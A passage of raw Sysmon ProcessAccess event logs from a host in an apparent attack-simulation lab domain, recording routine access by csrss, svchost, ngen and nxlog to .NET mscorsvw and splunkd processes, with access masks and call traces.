C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.480","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010ED590B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7443,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.496\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010ED590B00}\r\nTargetProcessId: 4368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.496","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010ED590B00}","TargetProcessId":"4368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7444,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.512\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010165D0B00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.512","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010165D0B00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7445,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.512\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010165D0B00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.512","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010165D0B00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7446,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.527\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-0010165D0B00}\r\nTargetProcessId: 4776\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.527","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-0010165D0B00}","TargetProcessId":"4776","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7447,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.621\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.621","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7448,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.887\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-001054610B00}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.887","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-001054610B00}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7449,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-001054610B00}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:54.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1326-5F25-0000-001054610B00}","TargetProcessId":"4164","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:54","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7450,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:54.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1326-5F25-0000-001054610B00}\r\nTargetProcessId: 4164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 